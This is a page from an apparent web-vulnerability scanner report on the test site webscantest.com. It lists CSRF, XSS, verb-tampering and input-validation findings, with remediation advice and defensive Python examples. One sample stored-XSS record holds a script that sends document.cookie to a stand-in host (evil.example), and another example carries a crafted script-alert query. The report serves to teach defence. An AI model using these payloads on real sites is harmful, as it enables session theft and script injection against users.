Vulnerabilities Report (Page 2 of 3)

 Scan Name: Webscantest-includeAPIs-reactjs
 Date: 8/24/2016 11:24:23 PM
 Authenticated User: testuser
 Total Links / Attackable Links: 416 / 416
 Target URL: http://webscantest.com

Summary

Root Causes: 250

(Charts not reproduced in this export: Vulnerabilities by Risk, Vulnerabilities by Who Will Fix, Most Vulnerable Sites.)

Vulnerability Type                                      Root Causes   Variances
------------------------------------------------------  -----------  ----------
Blind SQL Injection                                              15          48
Browser Cache directive (leaking sensitive information)          20          31
Brute Force Form based Authentication                             1           1
Buffer Overflow                                                   6          10
Business Logic Abuse                                              5           5
Command Injection                                                 1           4
Content Type Charset Check                                      100         153
Cross-Site Request Forgery (CSRF)                                25          50
Custom Passive Check                                             10          10
Directory Indexing                                                3           3
DOM based Cross-site scripting (XSS)                              1           1
HTTP Verb Tampering                                               1           2
HttpOnly attribute                                                5           7
Information Leakage                                               4           4
Parameter Fuzzing                                                 6          16
Persistent Cross-site scripting (XSS)                             2           6
Predictable Resource Location                                     2           2
Reflected Cross-site scripting (XSS)                             20         141
Server Type Disclosure                                            2           2
Session Fixation                                                  1           1
Session Strength                                                  1           1
SQL Information Leakage                                           5           7
SQL Injection                                                     9          36
SQL injection Auth Bypass                                         1           3
SQL Parameter Check                                               1           1
XPath Injection                                                   3          11
------------------------------------------------------  -----------  ----------
Total                                                           250         556

Details


Cross-Site Request Forgery (CSRF)

Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/aboutyou.php Root Cause #150: (2 Attack Variances)
URL: http://webscantest.com/crosstraining/aboutyou2.php Root Cause #151: (2 Attack Variances)
URL: http://webscantest.com/crosstraining/request.php Root Cause #152: (2 Attack Variances)
URL: http://webscantest.com/crosstraining/review.php Root Cause #153: (2 Attack Variances)
URL: http://webscantest.com/crosstraining/search.php Root Cause #154: (2 Attack Variances)
URL: http://webscantest.com/crosstraining/sitereviews.php Root Cause #155: (2 Attack Variances)
URL: http://webscantest.com/csrf/csrfpost.php Root Cause #156: (2 Attack Variances)
URL: http://webscantest.com/csrf/token.php Root Cause #157: (2 Attack Variances)
URL: http://webscantest.com/datastore/search_by_id.php Root Cause #158: (2 Attack Variances)
URL: http://webscantest.com/datastore/search_by_name.php Root Cause #159: (2 Attack Variances)
URL: http://webscantest.com/datastore/search_double_by_name.php Root Cause #160: (2 Attack Variances)
URL: http://webscantest.com/datastore/search_single_by_name.php Root Cause #161: (2 Attack Variances)
URL: http://webscantest.com/infodb/comment.php Root Cause #162: (2 Attack Variances)
URL: http://webscantest.com/infodb/search_by_name.php Root Cause #163: (2 Attack Variances)
URL: http://webscantest.com/osrun/whois.php Root Cause #164: (2 Attack Variances)
URL: http://webscantest.com/osrun/whois_nv.php Root Cause #165: (2 Attack Variances)
URL: http://webscantest.com/payment_analysis/checkdata.php Root Cause #166: (2 Attack Variances)
URL: http://webscantest.com/rest/demo/index.php/products/52904 Root Cause #167: (2 Attack Variances)
URL: http://webscantest.com/rest/demo/index.php/products/56035 Root Cause #168: (2 Attack Variances)
URL: http://webscantest.com/shutterdb/filter_by_name.php Root Cause #169: (2 Attack Variances)
URL: http://webscantest.com/shutterdb/search_by_id.php Root Cause #170: (2 Attack Variances)
URL: http://webscantest.com/shutterdb/search_by_name.php Root Cause #171: (2 Attack Variances)
URL: http://webscantest.com/soap/demo/api/ Root Cause #172: (2 Attack Variances)

Site: http://www.webscantest.com:80
URL: http://www.webscantest.com/soap/demo/api/index.php Root Cause #173: (2 Attack Variances)

Description:  

Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, such as changing the victim's e-mail address, home address, or password, or purchasing something. CSRF attacks generally target functions that cause a state change on the server, but they can also be used to access sensitive data.
For most sites, browsers automatically attach to such requests any credentials associated with the site: the user's session cookie, HTTP basic-auth credentials, Windows domain credentials, and so on. Because the request originates from the victim's machine, any trust the site places in the client's IP address rides along as well. Therefore, if the user is currently authenticated to the site, the site has no way to distinguish a forged request from a legitimate one unless something in the request itself proves that the user intended it.
In this way, the attacker can make the victim perform actions they did not intend, such as logging out, purchasing an item, changing account information, retrieving account information, or any other function the vulnerable website provides.
Sometimes it is possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called Stored CSRF flaws. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or through a more complex cross-site scripting attack. Storing the attack on the site amplifies its severity: the victim is more likely to view a page on the site than some random page on the Internet, and a victim viewing that page is sure to be authenticated already.
Synonyms: CSRF attacks are also known by a number of other names, including XSRF, "Sea Surf", Session Riding, Cross-Site Reference Forgery, and Hostile Linking. Microsoft refers to this type of attack as a One-Click attack in its threat modeling process and in many places in its online documentation.


Recommendations:  

Web sites have several CSRF countermeasures available:

  • Requiring a secret, user-specific token in all form submissions and side-effect URLs prevents CSRF; the attacker's site cannot put the right token in its submissions because it cannot read the victim's pages across origins.
  • Requiring the client to re-supply authentication data (a password or a second factor) in the same HTTP request that performs an operation with security implications (money transfer, etc.).
  • Limiting the lifetime of session cookies, which narrows the window in which a forged request can succeed.
  • Checking the HTTP Referer (or Origin) header; for state-changing requests, treat a missing header as a failure rather than letting it pass.
  • Marking the session cookie SameSite=Lax or Strict so that browsers omit it from cross-site requests; this is defence in depth, not a replacement for the token.
  • Ensuring that there is no clientaccesspolicy.xml file granting unintended access to Silverlight controls.
  • Ensuring that there is no crossdomain.xml file granting unintended access to Flash movies.

An easy and effective solution is to use a CSRF filter such as OWASP's CSRFGuard. The filter intercepts responses, detects whether each is an HTML document and inserts a token into its forms, optionally also injecting script that adds the token to AJAX calls. The filter also intercepts requests to check that the token is present and correct.
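The synchronizer-token pattern from the first recommendation, as an added example that is not code from the scanned application or from CSRFGuard. The session store, the hidden-field name csrf_token and the request dicts are constructed stand-ins for a real framework's objects; the point is that the browser attaches the session cookie to the forged request just as it does to the real one, so only the token distinguishes them.

```python
"""Synchronizer-token CSRF protection for a state-changing form handler.
Added illustration for this report, not code from the scanned site or the
scanner; SESSIONS and the request dicts stand in for a framework's objects."""
import hmac
import secrets

TOKEN_FIELD = "csrf_token"   # hypothetical hidden-field name

# Constructed server-side session store: session id -> session data.
SESSIONS = {}


def new_session(user="testuser"):
    """Start a session and bind a fresh, unguessable CSRF token to it."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, TOKEN_FIELD: secrets.token_urlsafe(32)}
    return sid


def render_form(sid):
    """Emit the session's token as a hidden field. An attacker's page cannot
    read this form across origins, so it cannot copy the value."""
    token = SESSIONS[sid][TOKEN_FIELD]
    return ('<form method="POST" action="/csrf/csrfpost.php">'
            f'<input type="hidden" name="{TOKEN_FIELD}" value="{token}">'
            '<input name="property"><button>Save</button></form>')


def handle_post(sid, form):
    """State-changing handler returning (status, message). The browser sends
    the session cookie with a forged request too, so the cookie proves
    nothing; only a matching token does. compare_digest keeps the check
    constant-time so the token cannot be recovered byte by byte."""
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "no session"
    submitted = form.get(TOKEN_FIELD, "")
    expected = session[TOKEN_FIELD]
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return 403, "CSRF token missing or invalid"
    return 200, f"saved property={form.get('property', '')}"


def demo():
    """Legitimate submission vs. two forged ones (no token, guessed token)."""
    sid = new_session()
    legit = {TOKEN_FIELD: SESSIONS[sid][TOKEN_FIELD], "property": "tenant"}
    no_token = {"property": "attacker"}
    guessed = {TOKEN_FIELD: secrets.token_urlsafe(32), "property": "attacker"}
    return [handle_post(sid, f)[0] for f in (legit, no_token, guessed)]


if __name__ == "__main__":
    print(demo())   # [200, 403, 403]
```

The token is bound to the session rather than to the user, so a logout-and-login cycle rotates it; a per-request token is stricter but breaks multi-tab use, and is rarely worth it when the comparison is constant-time and the token has 256 bits of entropy.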


Custom Passive Check

Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/product.php Root Cause #174: (1 Attack Variance)
URL: http://webscantest.com/crosstraining/products.php Root Cause #175: (1 Attack Variance)
URL: http://webscantest.com/crosstraining/review.php Root Cause #176: (1 Attack Variance)
URL: http://webscantest.com/datastore/search_get_by_id.php Root Cause #177: (1 Attack Variance)
URL: http://webscantest.com/shutterdb/filter_by_name.php Root Cause #178: (1 Attack Variance)
URL: http://webscantest.com/shutterdb/search_get_by_id.php Root Cause #179: (1 Attack Variance)
URL: http://webscantest.com/shutterdb/search_get_by_id2.php Root Cause #180: (1 Attack Variance)
URL: http://webscantest.com/shutterdb/search_get_by_id3.php Root Cause #181: (1 Attack Variance)
URL: http://webscantest.com/shutterdb/search_get_by_id4.php Root Cause #182: (1 Attack Variance)
URL: http://webscantest.com/shutterdb/search_get_by_id5.php Root Cause #183: (1 Attack Variance)

Description:  

The description for the Example Passive Attack.


Recommendations:  

Refer to your web server's documentation for instructions.


Directory Indexing

Site: http://webscantest.com:80
URL: http://webscantest.com/css/ Root Cause #184
URL: http://webscantest.com/images/ Root Cause #185
URL: http://webscantest.com/myfiles/ Root Cause #186

Description:  

A full list of a directory's content can be viewed. This reveals each file and subdirectory, regardless of whether or not it is related to the web application. A directory listing may also reveal backup files, include files, or configuration files that are not normally viewable by users. When these types of files can be found, they often disclose sensitive information about the application.


Recommendations:  

Refer to your web server's documentation for instructions on prohibiting directory listings (for Apache, remove Indexes from the directory's Options or set Options -Indexes; for nginx, make sure autoindex is off). For directories that must exist but should never be browsed, add an index file or an access restriction as well, so that a future configuration change does not silently re-expose them.


DOM based Cross-site scripting (XSS)

Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/sample.php Root Cause #187: (1 Attack Variance)

Description:  

DOM-based Cross-Site Scripting is the name for XSS bugs that result from active content on a page, typically JavaScript, reading attacker-influenced input and doing something unsafe with it that leads to execution of injected code. This entry discusses only JavaScript bugs that lead to XSS.

The DOM (Document Object Model) is the structure the browser uses to represent a document. It lets scripts reference components of the document such as a form field or a session cookie, and the browser also relies on it for security, for example to stop scripts on one origin from reading another origin's cookies. A DOM-based XSS vulnerability occurs when client-side code takes a value from a DOM source the attacker can influence (the URL fragment or query string, document.referrer, a postMessage payload) and writes it, without encoding, into a DOM element or API that interprets it as markup or code.

The class was formalized later than reflected and stored XSS, and its terminology and testing methodology are less standardized; it is also harder to find with server-side-only scanning, since the payload may never reach the server.


Recommendations:  

Not all XSS bugs require the attacker to control content returned from the server; poor client-side JavaScript practices can achieve the same result. The consequences are those of any XSS flaw; only the means of delivery differs.

In reflected and stored XSS an unsanitized value is emitted by the server and executed in the context of the user's browser. In DOM-based XSS, the client-side code itself reads an attacker-controlled value from the DOM (location.hash, location.search, document.referrer, data received via postMessage) and passes it to a dangerous sink (innerHTML, document.write, eval, setTimeout with a string argument, jQuery's html()), so the injection happens entirely inside the browser.

Because the payload can be carried in the URL fragment, which the browser never sends to the server, the server may have no record of what was executed, and general XSS filtering and detection rules on the server or in a web application firewall cannot see it. Review client-side code for source-to-sink flows: assign untrusted values with textContent or setAttribute rather than innerHTML, avoid eval and other string-to-code APIs, and validate fragment and query values against an allowlist before use.
The consequences of DOM-based cross-site scripting flaws are as wide-ranging as those of the better-known forms of XSS, including cookie retrieval and further malicious script injection, and they should be treated with the same severity.


HTTP Verb Tampering

Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/review.php Root Cause #188: (2 Attack Variances)

Description:  

A page that is only ever reached by POST in normal use also answers a GET request for the same parameters.

This attack module re-sends a request that was only observed as a POST using the GET method.
HTTP verb tampering is generally used in conjunction with syntactic and semantic attacks as a way to bypass defence measures that inspect one channel only.
When an application does not properly handle user-supplied data, an attacker can supply content, typically via a parameter value, that is reflected back to the user.
By requesting the link with a modified HTTP verb, the page renders the parameter values from the query string, so a payload that would otherwise have required the victim to submit a form can be delivered in a plain link.

Recommendations:  

Some resources legitimately allow both GET and POST, e.g. an edit form may be hyperlinked using a parameter value that selects the record to be edited, while the form itself is submitted by POST to the same URL. Users may also bookmark a page that is the result of a POST and return to it later.

To protect yourself from syntactic HTTP verb manipulation attacks, read user-supplied data only from where it is expected to arrive (query string or POST body), and if both must be accepted, validate both the same way. Reject methods the resource does not support with 405 Method Not Allowed. Copy into the session object only the parameter names you expect to receive; do not allow attackers to add arbitrary name/value pairs.
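The pattern the verb-tampering check exercises, beside its fix, as an added example that is not the scanned application's code. The report does not list review.php's parameters, so comment and rating are assumed names; the "vulnerable" handler imitates PHP's $_REQUEST, which merges query-string and body parameters without regard to method.

```python
"""Why a POST-only page answering GET matters, and the fix. Added example,
not the scanned application's code; 'comment' and 'rating' are assumed names."""
import html
from urllib.parse import parse_qs


def first_values(encoded):
    """application/x-www-form-urlencoded -> {name: first value}."""
    return {k: v[0] for k, v in parse_qs(encoded, keep_blank_values=True).items()}


def review_vulnerable(method, query, body):
    """$_REQUEST-style handling: query string and body are merged and the
    method is never checked, so a crafted link drives a POST-only form and
    its parameter is rendered unescaped."""
    params = first_values(query)
    if method == "POST":
        params.update(first_values(body))
    return 200, f"<p>Your review: {params.get('comment', '')}</p>"


ALLOWED_FIELDS = {"comment", "rating"}


def review_fixed(method, query, body):
    """Only POST is accepted, only the body is read, only expected names are
    kept, and the value is HTML-encoded on output."""
    if method != "POST":
        return 405, "Method Not Allowed"     # send an Allow: POST header too
    form = {k: v for k, v in first_values(body).items() if k in ALLOWED_FIELDS}
    return 200, f"<p>Your review: {html.escape(form.get('comment', ''))}</p>"


# Constructed GET carrying the payload in the query string, as a crafted
# link sent to a victim would.
CRAFTED_QUERY = "comment=%3Cscript%3Ealert(1)%3C%2Fscript%3E"

if __name__ == "__main__":
    print(review_vulnerable("GET", CRAFTED_QUERY, ""))
    print(review_fixed("GET", CRAFTED_QUERY, ""))
    print(review_fixed("POST", CRAFTED_QUERY, "comment=%3Cb%3Ehi&admin=1"))
```

Note that the fixed handler still encodes the output: rejecting GET removes the link-based delivery, but a victim can be made to POST too (a hidden auto-submitting form), so verb enforcement is a hardening step, not the XSS fix.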


HttpOnly attribute

Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/request.php Root Cause #189: (1 Attack Variance)
URL: http://webscantest.com/datastore/search_get_by_id.php Root Cause #190: (1 Attack Variance)
URL: http://webscantest.com/login.php Root Cause #191: (3 Attack Variances)
URL: http://webscantest.com/shutterdb/search_get_by_id4.php Root Cause #192: (1 Attack Variance)
URL: http://webscantest.com/shutterdb/search_get_by_id5.php Root Cause #193: (1 Attack Variance)

Description:  

The HttpOnly attribute directs browsers to expose a cookie only through HTTP(S) requests and responses. An HttpOnly cookie is not accessible from client-side script (for example via document.cookie) and therefore cannot be stolen as easily through cross-site scripting, a pervasive attack technique.


Recommendations:  

Set the HttpOnly flag on every cookie that client-side script does not need, the session cookie above all. When the flag is present on the Set-Cookie header, a supporting browser (all current browsers do) will not reveal the cookie to script, so even if a cross-site scripting flaw exists and a user follows a link that exploits it, the injected script cannot read the cookie. The flag limits cookie theft only: script running in the page can still issue requests that carry the cookie, so HttpOnly is a mitigation for XSS, not a fix. On a site served over HTTPS, pair it with the Secure flag so the cookie is never sent in clear text.


Information Leakage

Site: http://webscantest.com:80
URL: http://webscantest.com/cors_private.php Root Cause #194: (1 Attack Variance)
URL: http://webscantest.com/cors_public.php Root Cause #195: (1 Attack Variance)

Site: http://www.webscantest.com:80
URL: http://www.webscantest.com/cors_private.php Root Cause #196: (1 Attack Variance)
URL: http://www.webscantest.com/cors_public.php Root Cause #197: (1 Attack Variance)

Description:  

Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.


Recommendations:  

Depending on the system configuration, this information can be dumped to a console, written to a log file, or returned to a remote user. In some cases the error message tells the attacker precisely what sort of attack the system will be vulnerable to: a database error message can reveal that the application is vulnerable to SQL injection, and other messages give more oblique clues.
A file-system path in a stack trace, for example, can imply the operating system, the applications installed on the system, and how much care the administrators have put into configuring the program.
Return a generic error page to the client, keep the detailed message in a server-side log, and disable debug output in production (for a PHP site, display_errors off and log_errors on).


Parameter Fuzzing

Site: http://webscantest.com:80
URL: http://webscantest.com/payment_analysis/checkdata.php Root Cause #198: (Parameter: number / 3 Attack Variances)
URL: http://webscantest.com/payment_analysis/checkdata.php Root Cause #199: (Parameter: letters_only / 3 Attack Variances)
URL: http://webscantest.com/payment_analysis/checkdata.php Root Cause #200: (Parameter: alpha_only / 2 Attack Variances)
URL: http://webscantest.com/payment_analysis/checkdata_get.php Root Cause #201: (Parameter: number / 3 Attack Variances)
URL: http://webscantest.com/payment_analysis/checkdata_get.php Root Cause #202: (Parameter: letters_only / 3 Attack Variances)
URL: http://webscantest.com/payment_analysis/checkdata_get.php Root Cause #203: (Parameter: alpha_only / 2 Attack Variances)

Description:  

An invalid character submitted in a URL parameter causes an error in the database query or script execution. This indicates that the application has not fully validated user-supplied input. Such errors can lead to HTML injection, SQL injection, or arbitrary code execution.


Recommendations:  

  • Normalize all user-supplied data before applying filters, regular expressions, or submitting the data to a database. All URL-encoded (%xx), HTML-encoded (&#xx;), or otherwise encoded forms should be reduced to the internal character representation the application expects, so that attackers cannot use alternate or double encodings to bypass filters.
  • Implement positive filters that examine user-supplied data for expected characters. Define data types for user-supplied values and ensure that submitted data match these types, such as numeric or date. String or text values should be matched against a limited subset of characters (alpha, numeric, spaces, or specific punctuation) as necessary. If any value received by the application contains an unexpected character, reject it rather than trying to repair it.
  • Negative filtering (blocking known-bad characters) can also prevent attacks but is unreliable and hard to get right, especially for languages that require non-ASCII characters, and it is no substitute for parameterized queries: pass every value to the database as a bound parameter so that quote characters (' and "), comment sequences (-- and /* */), semicolons and parentheses cannot change the structure of the query. Where legacy code must escape instead, use the database driver's escaping function, never a hand-written replacement.
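Normalize-then-allowlist validation for the three checkdata.php parameters named above, followed by a parameterized query, as an added example that is not the scanned application's code. The report does not state the intended format of number, letters_only or alpha_only, so the rules below are assumptions (digits; ASCII letters; alphanumeric), and the product table is constructed in memory.

```python
"""Normalize, then positively validate, then bind. Added example, not the
scanned application's code; the per-parameter rules are assumptions and the
product table is a constructed stand-in for the application's database."""
import html
import re
import sqlite3
import unicodedata
from urllib.parse import unquote

RULES = {
    "number":       re.compile(r"[0-9]{1,10}"),
    "letters_only": re.compile(r"[A-Za-z]{1,64}"),
    "alpha_only":   re.compile(r"[A-Za-z0-9]{1,64}"),   # assumed: alphanumeric
}


def normalize(value, max_rounds=3):
    """Reduce to the application's internal representation before checking:
    undo URL and HTML-entity encoding, repeated a bounded number of times so
    double encoding (%2527 -> %27 -> ') cannot slip past, then fold Unicode
    compatibility forms (fullwidth quotes and the like) with NFKC."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return unicodedata.normalize("NFKC", value)


def validate(params):
    """Positive filter: unknown names and non-matching values are rejected,
    never repaired. Returns (clean values, error messages)."""
    clean, errors = {}, []
    for name, raw in params.items():
        rule = RULES.get(name)
        if rule is None:
            errors.append(f"{name}: unexpected parameter")
            continue
        value = normalize(raw)
        if rule.fullmatch(value):
            clean[name] = value
        else:
            errors.append(f"{name}: rejected {raw!r}")
    return clean, errors


def lookup_product(conn, number):
    """Even a validated value goes in as a bound parameter, so the query's
    structure cannot be altered by anything the validator happened to admit."""
    row = conn.execute("SELECT name FROM products WHERE id = ?",
                       (int(number),)).fetchone()
    return row[0] if row else None


def demo_db():
    """Constructed in-memory table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(52904, "Trail shoe"), (56035, "Water bottle")])
    return conn


if __name__ == "__main__":
    clean, errors = validate({"number": "52904", "letters_only": "Bob%2527",
                              "alpha_only": "x&#39;y", "debug": "1"})
    print(clean, errors)
    print(lookup_product(demo_db(), clean["number"]))
```

The decode loop must mirror what the application and its web server actually decode; if a field legitimately contains a literal percent sign, decoding it again would be wrong, which is one more reason to reject unexpected input instead of transforming it.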


Persistent Cross-site scripting (XSS)

Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/request.php Root Cause #204: (Parameter: fname / 5 Attack Variances)
URL: http://webscantest.com/crosstraining/reservation_history.php Root Cause #205: (1 Attack Variance)


Description:  

Persistent (stored) Cross-site Scripting is the variant in which the injected script is saved by the vulnerable application itself, in a database, message forum, visitor log, or other trusted data store, and is served to every user who later views the stored data. Unlike reflected XSS, the victim does not need to follow a crafted link; loading the ordinary page that renders the stored content is enough. For example, the attacker might inject script into a log message or a review field, which is then executed when an administrator views the logs or another customer reads the reviews.


Recommendations:  

  • Encode all stored data at the point it is written into the page, using the encoding the destination context requires (HTML body, attribute value, JavaScript string, URL). Treat data as untrusted even when it comes from your own database, since that is exactly where a stored payload lives.
  • Validate input on the server with positive rules (expected characters, lengths and types), but do not rely on input filtering alone: the stored value may later be rendered in a context the filter did not anticipate.
  • Use a security-focused encoding library rather than hand-written replacements, and do not strip or "neutralize" characters in ways an attacker can undo with alternate encodings.
  • Never insert untrusted data directly into the HTML document, into script blocks, or into event-handler attributes.
  • For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.
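Context-aware output encoding for stored data, as an added example that is not code from the scanned site. The stored reviews are constructed to look like what an attacker could have saved through request.php's fname field, and they are kept verbatim in the store, because encoding belongs at output rather than at storage.

```python
"""Encode stored data for the exact context it lands in. Added example, not
the scanned site's code; STORED_REVIEWS is constructed data."""
import html
import json

# Constructed stored records; the second is an attacker's submission kept
# verbatim, which is correct: the store holds data, the template encodes it.
STORED_REVIEWS = [
    {"fname": "Alice", "comment": "Great trip!"},
    {"fname": "<script>fetch('//evil.example/?c='+document.cookie)</script>",
     "comment": '" onmouseover="alert(1)'},
]


def for_html_body(s):
    """Element content: & < > suffice; quotes are harmless here."""
    return html.escape(s, quote=False)


def for_html_attr(s):
    """Quoted attribute value: also encode both quote characters."""
    return html.escape(s, quote=True)


def for_js_string(s):
    """JavaScript string literal inside a <script> block: JSON-encode, then
    hex-escape the characters that could close the script element or start
    markup, because the HTML parser does not understand JS escapes. The two
    Unicode line terminators are escaped since they are not valid in JS strings."""
    return (json.dumps(s).replace("<", "\\u003c").replace(">", "\\u003e")
            .replace("&", "\\u0026")
            .replace("\u2028", "\\u2028").replace("\u2029", "\\u2029"))


def render_review(r):
    """Each placeholder uses the encoder for its own context."""
    return (f'<div class="review" data-author="{for_html_attr(r["fname"])}">'
            f'<b>{for_html_body(r["fname"])}</b>: '
            f'<span title="{for_html_attr(r["comment"])}">'
            f'{for_html_body(r["comment"])}</span>'
            f'<script>var author = {for_js_string(r["fname"])};</script>'
            '</div>')


def render_history(reviews=STORED_REVIEWS):
    """What reservation_history.php-style output should look like."""
    return "\n".join(render_review(r) for r in reviews)


if __name__ == "__main__":
    print(render_history())
```

One encoder per context is the whole point: HTML-escaping a value and then dropping it into a script block, or into an unquoted attribute, leaves it exploitable even though it "was encoded".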


Predictable Resource Location

Site: http://webscantest.com:80
URL: http://webscantest.com/robots.txt Root Cause #206

Site: http://www.webscantest.com:80
URL: http://www.webscantest.com/robots.txt Root Cause #207

Description:  

A robots.txt file is present in the web root. The robots.txt file lists directories that crawling engines are requested to ignore; there is no way to force a crawler to honor it, and an attacker reads it as a map. Depending on its content, it may reveal administrator interfaces or alternate URLs that are supposed to be hidden from users.


Recommendations:  

  1. Ensure that the robots.txt file does not divulge directories that are intended to be hidden from users.
  2. The security of sensitive directories should not rely on hiding their presence. Restrict access to sensitive directories (e.g. admin) by authentication and by IP address or network location.
  3. Amend your deployment policy to include the removal of sensitive directories from robots.txt files, and review the file whenever it changes.
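A review check for the first and third recommendations, as an added example: it parses a robots.txt the way crawlers group records and flags Disallow entries whose path advertises an administrative or backup area. The file content is constructed, not fetched from webscantest.com, and the word list is a starting point rather than a standard.

```python
"""Parse robots.txt and flag Disallow entries that should not be advertised.
Added example; ROBOTS_TXT is constructed and SENSITIVE is an assumed list."""
import re

ROBOTS_TXT = """\
# constructed sample, not the scanned site's file
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /myfiles/
Disallow: /images/

User-agent: BadBot
Disallow: /
Sitemap: http://webscantest.com/sitemap.xml
"""

SENSITIVE = re.compile(r"admin|backup|\.bak|private|secret|config|upload|internal", re.I)


def parse_robots(text):
    """Group records as crawlers do: consecutive User-agent lines share the
    Allow/Disallow rules that follow them. Returns [{agents, rules}]."""
    groups, current, rules_started = [], None, False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and blanks
        if not line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if current is None or rules_started:
                current = {"agents": [], "rules": []}
                groups.append(current)
                rules_started = False
            current["agents"].append(value)
        elif field in ("allow", "disallow") and current is not None:
            current["rules"].append((field, value))
            rules_started = True
        # Sitemap and unknown fields are ignored for this check.
    return groups


def disallowed_paths(text):
    """Every non-empty Disallow path, across all groups."""
    return [v for g in parse_robots(text)
            for f, v in g["rules"] if f == "disallow" and v]


def sensitive_disallows(text):
    """Disallow entries whose path hints at an admin or backup area: each one
    is a URL the file hands to anyone who reads it."""
    return sorted({p for p in disallowed_paths(text) if SENSITIVE.search(p)})


if __name__ == "__main__":
    print(sensitive_disallows(ROBOTS_TXT))   # ['/admin/', '/backup/']
```

A hit means the path should be protected by authentication and network restriction and then dropped from the file; keeping it listed after it is protected still tells an attacker where to look.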


Reflected Cross-site scripting (XSS)

Site: http://webscantest.com:80
URL: http://webscantest.com/bjax/servertime.php Root Cause #208: (Parameter: msg / 8 Attack Variances)
URL: http://webscantest.com/business/account.php Root Cause #209: (Parameter: accountId / 8 Attack Variances)
URL: http://webscantest.com/crosstraining/ Root Cause #210: (Parameter: Referer / 4 Attack Variances)
URL: http://webscantest.com/crosstraining/aboutyou.php Root Cause #211: (Parameter: fname / 8 Attack Variances)
URL: http://webscantest.com/crosstraining/aboutyou2.php Root Cause #212: (Parameter: fname / 8 Attack Variances)
URL: http://webscantest.com/crosstraining/aboutyou2.php Root Cause #213: (Parameter: nick / 8 Attack Variances)
URL: http://webscantest.com/crosstraining/aboutyou2.php Root Cause #214: (Parameter: returnto / 8 Attack Variances)
URL: http://webscantest.com/crosstraining/blockedbyns.php Root Cause #215: (Parameter: Comment / 2 Attack Variances)
URL: http://webscantest.com/crosstraining/checkitem_lookup.php Root Cause #216: (Parameter: q / 8 Attack Variances)
URL: http://webscantest.com/crosstraining/index.php Root Cause #217: (Parameter: Referer / 4 Attack Variances)
URL: http://webscantest.com/crosstraining/request.php Root Cause #218: (Parameter: fname / 8 Attack Variances)
URL: http://webscantest.com/crosstraining/reservation_submit.php Root Cause #219: (Parameter: arrive_date / 8 Attack Variances)
URL: http://webscantest.com/crosstraining/sitereviews.php Root Cause #220: (Parameter: description / 8 Attack Variances)
URL: http://webscantest.com/csrf/csrfpost.php Root Cause #221: (Parameter: property / 8 Attack Variances)
URL: http://webscantest.com/csrf/session.php Root Cause #222: (Parameter: jsession / 8 Attack Variances)